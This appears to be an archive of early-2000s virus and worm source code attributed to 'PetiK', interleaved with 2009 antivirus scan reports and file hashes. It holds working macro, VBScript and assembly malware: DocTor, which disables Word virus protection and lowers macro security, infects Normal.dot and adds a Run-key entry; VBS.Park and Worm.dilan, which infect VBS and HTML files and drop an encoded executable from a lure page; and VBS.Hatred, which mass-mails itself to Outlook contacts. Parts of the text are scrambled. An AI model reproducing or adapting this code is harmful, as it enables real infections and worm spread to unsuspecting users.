mel.Send e = "" Next y map.Logoff End If End If End Sub Sub Install() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") org = App.Path & "\" & App.EXEName & ".exe" cop = fso.GetSpecialfolder(0) & "\Doctor.exe" copreg = fso.GetSpecialfolder(0) & "\Doctor.exe /newrun" FileCopy org, cop ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor", copreg End Sub Sub DocVir() On Error Resume Next Dim lngbufferlen Dim bbyte As Byte Dim pefile As String orig = App.Path & "\" & App.EXEName & ".exe" Open orig For Binary As #1 DoEvents Do While Not EOF(1) DoEvents Get #1, , bbyte e = Hex(bbyte) If Len(e) = 1 Then e = "0" & Hex(bbyte) pefile = pefile & e Loop Close #1 hexf = "pef = """ For i = 1 To Len(pefile) Step 110 hexf = hexf & Mid(pefile, i, 110) & """" & vbCrLf & "pef = pef & """ Next hexf = hexf & """" & vbCrLf inst = "read = dec(pef)" & vbCrLf & _ "Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & ""\Doctor.exe"", 2)" & vbCrLf & _ "r.Write read" & vbCrLf & _ "r.Close" & vbCrLf & _ "ws.RegWrite ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor"", fso.GetSpecialFolder(0) & ""\Doctor.exe /newrun""" conv = "Function dec(octe)" & vbCrLf & _ "On Error Resume Next" & vbCrLf & _ "For hexad = 1 To Len(octe) Step 2" & vbCrLf & _ "dec = dec & Chr(""&h"" & Mid(octe, hexad, 2))" & vbCrLf & _ "Next" & vbCrLf & _ "End Function" & vbCrLf infwrd = "Set doc = ActiveDocument.VBProject.VBComponents(1)" & vbCrLf & _ "Set nor = NormalTemplate.VBProject.VBComponents(1)" & vbCrLf & _ "With Options" & vbCrLf & _ ".ConfirmConversions = False" & vbCrLf & _ ".VirusProtection = False" & vbCrLf & _ ".SaveNormalPrompt = False" & vbCrLf & _ "End With" & vbCrLf & _ "Select Case Application.Version" & vbCrLf & _ "Case ""10.0""" & vbCrLf & _ "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""Level"") = 1&" & vbCrLf & _ "System.PrivateProfileString("""",

""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"", ""AccessVBOM"") = 1&" & vbCrLf & _ "Case ""9.0""" & vbCrLf & _ "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"", ""Level"") = 1&" & vbCrLf & _ "End Select" & vbCrLf & _ "WordBasic.DisableAutoMacros 0" & vbCrLf & vbCrLf & _ "If nor.Name <> ""DocTor"" Then" infwrd2 = "install doc, nor" & vbCrLf & _ "End If" & vbCrLf & _ "If doc.Name <> ""DocTor"" Then" & vbCrLf & _ "install nor, doc" & vbCrLf & _ "Activedocument.Save" & vbCrLf & _ "End If" instal = "Private Sub install(src, dst)" & vbCrLf & _ "Set odst = dst.CodeModule" & vbCrLf & _ "Set osrc = src.CodeModule" & vbCrLf & _ "odst.DeleteLines 1, odst.CountOfLines" & vbCrLf & _ "odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines)" & vbCrLf & _ "End Sub" & vbCrLf Open docv Print #1, Print #1, Print #1, Print #1, Print #1, Print #1, Print #1, Print #1, Print #1, Print #1, Print #1, Close #1 End Sub For Output As #1 "Private Sub Document_Open()" "On Error Resume Next" "Set fso=CreateObject(""Scripting.FileSystemObject"")" "Set ws=CreateObject(""WScript.Shell"")" & vbCrLf hexf infwrd inst infwrd2 "End Sub" & vbCrLf instal conv

Sub VbsDrop() On Error Resume Next vbsdrp = GetSpecialfolder(CSIDL_STARTUP) & "\doctor.vbs" vbs = "On Error Resume Next" & vbCrLf & _ "set fso=createobject(""scripting.filesystemobject"")" & vbCrLf & _ "set ws=createobject(""wscript.shell"")" & vbCrLf & _ "Set wrd=createObject(""Word.Application"")" & vbCrLf & _ "wrd.options.virusprotection=0" & vbCrLf & _ "wrd.options.savenormalprompt=0" & vbCrLf & _ "wrd.options.confirmconversions=0" & vbCrLf & _ "ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level"",1,""REG_DWORD""" & vbCrLf & _ "ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level"",1,""REG_DWORD""" & vbCrLf & _ "ws.regwrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM"",1,""REG_DWO RD""" & vbCrLf & _ "If wrd.normaltemplate.vbproject.vbcomponents(1).name <> ""DocTor"" then" & vbCrLf & _ "wrd.normaltemplate.vbproject.vbcomponents(1).codemodule.addfromfile(""" & docv & """)" & vbCrLf & _ "wrd.normaltemplate.vbproject.vbcomponents(1).name=""DocTor""" & vbCrLf & _ "End If" & vbCrLf & _ "wscript.sleep 500" & vbCrLf & _ "fso.deletefile """ & docv & """" & vbCrLf & _ "wrd.application.quit" Open vbsdrp For Output As #1 Print #1, vbs Close #1 End Sub Private Function GetCommLine() As String Dim RetStr As Long, SLen As Long Dim Buffer As String RetStr = GetCommandLine

SLen = lstrlen(RetStr) If SLen > 0 Then GetCommLine = Space$(SLen) CopyMemory ByVal GetCommLine, ByVal RetStr, SLen End If End Function Private Function GetSpecialfolder(CSIDL As Long) As String Dim r As Long Dim IDL As ITEMIDLIST r = SHGetSpecialFolderLocation(100, CSIDL, IDL) If r = NOERROR Then Path$ = Space$(512) r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$) GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1) Exit Function End If GetSpecialfolder = "" End Function

VBA Word Part Attribute VBA_ModuleType=VBADocumentModule Sub ThisDocument Private Sub Document_Open() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") pef pef pef pef pef pef = = = = = = "4D5A900000000000..." pef & "0000000000C00000..." pef & "53206D6F64652E0D..." pef & "2AAA88526963689D..." pef & "00000000000000" pef & ""

Set doc = ActiveDocument.VBProject.VBComponents(1) Set nor = NormalTemplate.VBProject.VBComponents(1) With Options .ConfirmConversions = False .VirusProtection = False .SaveNormalPrompt = False End With Select Case Application.Version Case "10.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1& System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1& Case "9.0" System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& End Select WordBasic.DisableAutoMacros 0 If nor.Name <> "DocTor" Then read = dec(pef) Set r = fso.CreateTextFile(fso.GetSpecialFolder(0) & "\Doctor.exe", 2) r.Write read r.Close ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DocTor", fso.GetSpecialFolder(0) & "\Doctor.exe /newrun" install doc, nor End If If doc.Name <> "DocTor" Then install nor, doc ActiveDocument.Save End If End Sub Private Sub install(src, dst) Set odst = dst.CodeModule Set osrc = src.CodeModule odst.DeleteLines 1, odst.CountOfLines odst.InsertLines 1, osrc.Lines(1, osrc.CountOfLines) End Sub Function dec(octe) On Error Resume Next For hexad = 1 To Len(octe) Step 2 dec = dec & Chr("&h" & Mid(octe, hexad, 2)) Next End Function

End Sub

File DocTor.exe received on 05.16.2009 11:30:42 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Dotor!IK Win32/Dotor.worm.11776 Worm/Dotor.1 Worm/Win32.Win32 W32/Dotor.A Win32:Dotor I-Worm/Dotor Win32.Dotor.A@mm I-Worm.Dotor Worm.Dotor Worm.Win32.DoTor.A Win32.HLLM.Generic.62 Win32.Doctor Win32/Dotor W32/Dotor.A Email-Worm.Win32.Dotor W32/Dotor.A!worm Win32.Dotor.A@mm Email-Worm.Win32.Dotor Email-Worm.Win32.Dotor Email-Worm.Win32.Dotor W32/DoTor@MM W32/DoTor@MM Worm.Doctor.4 Worm:Win32/Dotor.A@mm Win32/DoTor.A Dotor.A@mm W32/Dotor.A Email-Worm.Dotor!sd5 High Risk Cloaked Malware Worm.Mail.Dotor.a W32/Dotor-A W32.Dotor.A@mm W32.Dotor.A@mm W32/Dotor WORM_DOTOR.A Email-Worm.Win32.Dotor I-Worm.Pettor.A

Additional information File size: 11776 bytes MD5...: 76ff0b311e26f1322c63023c30c54549 SHA1..: 143baa09884c13cd59eb048f756954e5a6d2bc6d PEiD..: Crypto-Lock v2.02 (Eng) -&gt; Ryan Thian

File DocTor.doc received on 05.16.2009 11:30:41 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.15 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.15 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.15 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.15 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.735 2009.05.14 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.15 PCTools 4.4.2.0 2009.05.15 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.15 Additional information File size: 77312 bytes MD5...: 762645157dbc893c564928edfed2413b SHA1..: 66a67434fd6e3771666e4adaa28fd9b481f2b4bc

Result Email-Worm.VBS.Lee.Based!IK W97M/Dotor W2000M/Bumdoc.A Worm/Win32.Dotor W97M/Dotor.A MW97:Dotor-A W97M/Bumdoc W97M.Dotor.A W97M.Ethan WM.Pivis W97M.Doctor O97M.GNinducc W97M/Dotor.A W97M/Dotor.A Email-Worm.Win32.Dotor W97M/Dotor.A W97M.Dotor.A Email-Worm.VBS.Lee.Based Email-Worm.Win32.Dotor W97M/Generic W97M/Generic Macro.Bumdoc.A Virus:W97M/Dotor.A W97M/Dotor.A W97M/Dotor.A W97M.Dotor.A W97M/Dotor.A WORD.97.Pettor.A Unknown Micro Virus WM97/Dotor-A W97M.Dotor.A (v) W97M.Dotor.A@mm W2KM/Generico W97M_DOTOR.A Email-Worm.Win32.Dotor W97M.Dotor.A WORD.97.Pettor.A

' ' ' '

Name : VBS.Park Author : PetiK Language : VBS Date : 24/06/2002

On Error Resume Next Set fs=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") Set fl=fs0.OpenTextFile(WScript.ScriptFullName,1) virus=fl.ReadAll fl.Close f="virhex=""" For i=1 to Len(virus) e=Mid(virus,i,1) e=Hex(Asc(e)) If Len(e)=1 Then e="0"&e End If f=f & e Next f=f & """" On Error Resume Next For each drv in fs.Drives If drv.DriveType=2 or drv.DriveType=3 Then list(drv.path&"\") End If Next Sub list(dir) On Error Resume Next For each ssf in fs.GetFolder(dir).SubFolders infect(ssf.path) list(ssf.path) Next End Sub Sub infect(dir) For each fil in fs.GetFolder(dir).Files ext=lcase(fs.GetExtensionName(fil.path)) If ext="vbs" Then Set vb=fs.OpenTextFile(Q.path,1) If vb.ReadLine <> ""'VBS.Park"" Then vbsorg=vb.ReadAll() vb.Close Set vb=fs.OpenTextFile(Q.path,2) vb.WriteLine read(virhex) vb.WriteLine vbsorg vb.Close Else vb.Close End If ElseIf ext="htm" or ext="html" Then Set ht=fs.OpentextFile(P.path,1) htmf=ht.ReadAll ht.Close If InStr(1,htmf,"virhex",1) = 0 Then Set ht=fs.OpentextFile(P.path,8) ht.WriteBlankLines(2) ht.WriteLine "<SCRIPT LANGUAGE=VBScript>" ht.WriteLine "Set fs=CreateObject(""Scripting.FileSystemObject"")" ht.WriteLine "Set ws=CreateObject(""WScript.Shell"")" ht.WriteLine f ht.WriteLine "Infect(fso.GetSpecialFolder(0))" ht.WriteLine "Infect(fso.GetSpecialFolder(1))" ht.WriteLine "Infect(fso.GetSpecialFolder(2))" ht.WriteLine "Infect(""C:\"")" ht.WriteLine "Infect(ws.SpecialFolders(""MyDocuments""))"

ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.WriteLine ht.Close End If End If Next End Sub

"Infect(ws.SpecialFolders(""Desktop""))" "Infect(ws.SpecialFolders(""Favorites""))" "Sub Infect(dir)" "For each Q in fs.GetFolder(dir).Files" "ext=lcase(fs.GetExtensionName(Q.Name))" "If ext=""vbs"" Then" "Set vb=fs.OpenTextFile(Q.path,1)" "If vb.ReadLine <> ""'VBS.Park"" Then" "vbsorg=vb.ReadAll()" "vb.Close" "Set vb=fs.OpenTextFile(Q.path,2)" "vb.WriteLine read(virhex)" "vb.WriteLine vbsorg" "vb.Close" "Else" "vb.Close" "End If" "End If" "If ext=""htm"" or ext=""html"" Then" "Set ht=fs.OpenTextFile(Q.Path,1)" "If ht.ReadLine <> ""<vbshtmpark>"" Then" "htmorg=ht.ReadAll()" "ht.Close" "Set ht=fs.CreateTextFile(Q.Path,2)" "ht.WriteLine ""<vbshtmpark>""" "ht.Write(htmorg)" "ht.WriteLine document.body.CreateTextRange.htmltext" "ht.Close" "Else" "ht.Close" "End If" "End If" "Next" "End Sub" "Function read(octet)" "For hexa=1 To Len(octet) Step 2" "read=read & Chr(""&h"" & Mid(octet, hexa, 2))" "Next" "End Function" "</SCRIPT>"

File Park.vbs received on 05.16.2009 18:00:31 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Virus.VBS.Petik!IK VBS/Park Worm/Alcaul.U3 Virus/VBS.VBS VBS/Park.A VBS:Malware-gen VBS/Park VBS.Park.A Unclassified Malware VBS.Generic.42 VBS/Park!intended VBS/Park.A Virus.VBS.Petik VBS/Petik.A VBS.Park.A Virus.VBS.Petik Virus.VBS.Petik VBS/Park.b.intd VBS/Park.b.intd Worm.Alcaul.U3 Virus:VBS/Park.gen probably unknown SCRIPT VBS/Petik.H VBS.Intended.Park.A VBS.Park.A VBS.Dara Junk/Park-A VBS.Dara VBS_Parade.a Virus.VBS.Petik VBS.Park VBS.Park.A

Additional information File size: 3107 bytes MD5...: cfa6d1d7f6e6223bfdf9ae6350cc05b0 SHA1..: 8d988bc367ce0b20adcc177f2b73764a233d77cb

comment * Name : Worm.dilan aka adlin aka linda Author : PetiK Date : June 26th 2002 Language : win32asm Spread via HTML file and infected other HTM/HTML files in these folders: * .586p .model flat .code JUMPS include useful.inc include win32api.inc api endm start: pushad @SEH_SetupFrame get_name: push mov push push api <jmp end_worm> macro a extrn a:proc call a WINDOWS WINDOWS\SYSTEM WINDOWS\TEMP DESKTOP MY DOCUMENTS

50 esi,offset orgwrm esi 0 GetModuleFileNameA

get_copy_name: mov edi,offset cpywrm push edi push 50 push edi api GetWindowsDirectoryA add edi,eax mov eax,'acs\' stosd mov eax,'renn' stosd mov eax,'exe.' stosd pop edi copy_worm: push push push api 0 edi esi CopyFileA

push 50 push edi push 1 @pushsz "ScanW32" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA push push push push push push 0 0 3 0 1 80000000h

push api inc je dec xchg push push push push push push api test je xchg push push push push push api test je xchg push push api mov scan_mail: xor mov push p_c:

offset cpywrm CreateFileA eax end_worm eax ebx,eax 0 0 0 2 0 ebx CreateFileMappingA eax,eax end_w1 eax,ebp 0 0 0 4 ebp MapViewOfFile eax,eax end_w2 eax,esi 0 ebx GetFileSize [size],eax

edx,edx edi,offset hex_f edi lodsb call conv_hex stosw car_s: dec size cmp size,0 jne p_c entr1: xor al,al stosb pop edi f_mail: end_w3: push esi api UnmapViewOfFile end_w2: push ebp api CloseHandle end_w1: push ebx api CloseHandle push 0 push 5 push offset mydoc push 0 api SHGetSpecialFolderPathA @pushsz "\dilan.htm" push offset mydoc api lstrcat push 0 push 80h push 2 push 0 push 1 push 40000000h push offset mydoc api CreateFileA mov [hhtm],eax push 0 push offset byte push e_htm - s_htm push offset s_htm push [hhtm] api WriteFile push [hhtm]

api

CloseHandle

end_worm: @SEH_RemoveFrame popad push 0 api ExitProcess conv_hex: PUSH ECX PUSH EDI XOR ECX, ECX MOV CL, AL PUSH ECX SHR CL, 04h LEA EDI, Tab_Hex INC CL @@Y: INC EDI DEC CL JNZ @@Y DEC MOV POP AND LEA INC EDI AL, BYTE PTR [EDI] ECX CL, 0Fh EDI, Tab_Hex CL

@@X: INC EDI DEC CL JNZ @@X DEC MOV POP POP RET EDI AH, BYTE PTR [EDI] EDI ECX

.data orgwrm db 50 dup (0) cpywrm db 50 dup (0) mydoc db 70 dup (0) hhtm dd ? byte dd 0 size dd ? Tab_Hex db "0123456789ABCDEF", 00h s_htm: db '<dilan>',CRLF db '<html><head><title>Only For You!</title></head><body>',CRLF db '<script language=vbscript>',CRLF db 'On Error Resume Next',CRLF db 'Set fso=createobject("scripting.filesystemobject")',CRLF db 'Set ws=createobject("wscript.shell")',CRLF db 'If err.number=429 then',CRLF db 'document.write "<font face size=''4'' color=black>You need ActiveX enabled to see this file<br>' db '<a href=''javascript:location.reload()''>Click Here</a> to reload and CLICK YES</font>"',CRLF db 'Else',CRLF db 'asmhex="' hex_f db 1024 * 13 dup (0) db '"',CRLF db 'read = dec(asmhex)',CRLF db 'Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)',CRLF db 'r.Write read',CRLF db 'r.Close',CRLF db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc anner.exe"',CRLF,CRLF db 'infect(fso.GetSpecialFolder(0))',CRLF

'infect(fso.GetSpecialFolder(1))',CRLF 'infect(fso.GetSpecialFolder(2))',CRLF 'infect(ws.SpecialFolders("MyDocuments"))',CRLF 'infect(ws.SpecialFolders("Desktop"))',CRLF,CRLF 'MsgBox "Sorry but your browser can''t read this Web file."',CRLF 'End If',CRLF,CRLF 'Function infect(dir)',CRLF 'If fso.FolderExists(dir) Then',CRLF 'For each cible in fso.GetFolder(dir).Files',CRLF 'ext=lcase(fso.GetExtensionName(cible.Name))',CRLF 'If ext="htm" or ext="html" Then',CRLF 'Set gd=fso.OpenTextFile(cible.path,1)',CRLF 'If gd.readline <> "<dilan>" Then',CRLF 'htmorg=gd.Readall',CRLF 'gd.Close',CRLF 'Set gd=fso.OpenTextFile(cible.path,2)',CRLF 'gd.WriteLine "<dilan>"',CRLF 'gd.Write(htmorg)',CRLF 'gd.WriteLine document.body.createtextrange.htmltext',CRLF 'gd.Close',CRLF 'Else',CRLF 'gd.Close',CRLF 'End If',CRLF 'End If',CRLF 'Next',CRLF 'End If',CRLF 'End Function',CRLF,CRLF 'Function dec(octe)',CRLF 'On Error Resume Next',CRLF 'For hexad = 1 To Len(octe) Step 2',CRLF 'dec = dec & Chr("&h" & Mid(octe, hexad, 2))',CRLF 'Next',CRLF db 'End Function',CRLF db '</script></body></html>',CRLF e_htm: ends end

db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db

start

DILAN.HTM <dilan> <html><head><title>Only For You!</title></head><body> <script language=vbscript> On Error Resume Next Set fso=createobject("scripting.filesystemobject") Set ws=createobject("wscript.shell") If err.number=429 then document.write "<font face size='4' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and CLICK YES</font>" Else asmhex="4D5A50000200000004000F00FFFF..." read = dec(asmhex) Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2) r.Write read r.Close ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\sc anner.exe" infect(fso.GetSpecialFolder(0)) infect(fso.GetSpecialFolder(1)) infect(fso.GetSpecialFolder(2)) infect(ws.SpecialFolders("MyDocuments")) infect(ws.SpecialFolders("Desktop")) MsgBox "Sorry but your browser can't read this Web file." End If Function infect(dir) If fso.FolderExists(dir) Then For each cible in fso.GetFolder(dir).Files ext=lcase(fso.GetExtensionName(cible.Name)) If ext="htm" or ext="html" Then Set gd=fso.OpenTextFile(cible.path,1) If gd.readline <> "<dilan>" Then

htmorg=gd.Readall gd.Close Set gd=fso.OpenTextFile(cible.path,2) gd.WriteLine "<dilan>" gd.Write(htmorg) gd.WriteLine document.body.createtextrange.htmltext gd.Close Else gd.Close End If End If Next End If End Function Function dec(octe) On Error Resume Next For hexad = 1 To Len(octe) Step 2 dec = dec & Chr("&h" & Mid(octe, hexad, 2)) Next End Function </script></body></html>

File Dilan.exe received on 05.16.2009 11:30:36 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.15 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.15 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.15 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.15 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.735 2009.05.14 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.15 PCTools 4.4.2.0 2009.05.15 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.15 Additional information File size: 5120 bytes MD5...: e56a9313f5b25300de504cdce5c84bd8 SHA1..: 6901d7cc53cc5a3223fd9efe399082b119e80cf6 PEiD..: Crypto-Lock v2.02 (Eng) -&gt; Ryan Thian

Result Worm.Win32.Petik!IK Win-Trojan/Dilna.5120 Worm/Petik.B2 Worm/Win32.Petik W32/Dilan.A Win32:Petik-B I-Worm/Petik.B Win32.Petik.J@mm Worm.Petik.b Worm.Petik.B Worm.Win32.Petik.AD Win32.Petik.20480 Win32.Petik.b Win32/Petik.5120.C W32/Dilan.A Worm.Win32.Petik.b W32/Petik.F Win32.Petik.J@mm Worm.Win32.Petik Worm.Win32.Petik.b Worm.Win32.Petik.b W32/PetTick.aj W32/PetTick.aj Worm.Petik.B2 Worm:Win32/Dilna.A Win32/Petik.AD W32/Pet_Tick.Int Worm Generic Worm.Petik Medium Risk Malware Worm.Win32.Petik.b W32/Dilna-A Worm.Win32.Petik.b W95.Pet_Tick.gen W32/Petik.b TROJ_DILNA.A Worm.Win32.Petik.b Worm.Win32.Petik.5120 I-Worm.Petdil.A

' ' ' '

Name : VBS.Hatred Author : PetiK Language : VBS Date : 29/06/2002

On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") orig=WScript.ScriptFullName fcopy=fso.GetSpecialFolder(0) & "\LoveVSHatred.vbs" Call Copy(orig,fcopy) If orig=fcopy Then list(ws.SpecialFolders("MyDocuments")) list(fso.GetSpecialFolder(0)) Do Set out=CreateObject("Outlook.Application") Set map=out.GetNameSpace("MAPI") For each c In map.AddressLists If c.AddressEntries.Count <> 0 Then For d = 1 To c.AddressEntries.Count Set wpalr = out.CreateItem(0) wpalr.To = c.AddressEntries(d).Address wpalr.Subject = "Love or Hatred" wpalr.Body = "Open this file and choice..." wpalr.Attachments.Add(WScript.ScriptFullName) wpalr.DeleteAfterSubmit = True If wpalr.To <> "" Then wpalr.Send End If Next End If Next Loop End If Sub Copy(src,dst) fso.CopyFile orig,fcopy ws.RegWrite "HKLM\Software\Microsoft\Windows\Currentversion\Run\LVSH",fcopy End Sub Sub list(dir) For Each f1 In fso.GetFolder(dir).SubFolders infect(f1.Path) list(f1.Path) Next End Sub Sub infect(dir) For Each fil In fso.GetFolder(dir).Files ext = fso.GetExtensionName(fil.Path) ext = lCase(ext) If (ext = "htm") or (ext = "html") Then Set h=fso.OpenTextFile(fil.Path,1) scnm=h.ReadAll h.Close For j = 1 To Len(scnm) If Mid(scnm, j, 7) = "mailto:" Then mlto = "" cnt = 0 Do While Mid(scnm, j + 7 + cnt, 1) <> """" mlto = mlto + Mid(scnm, j + 7 + cnt, 1) cnt = cnt + 1 Loop SendMail(mlto) End If Next End If Next

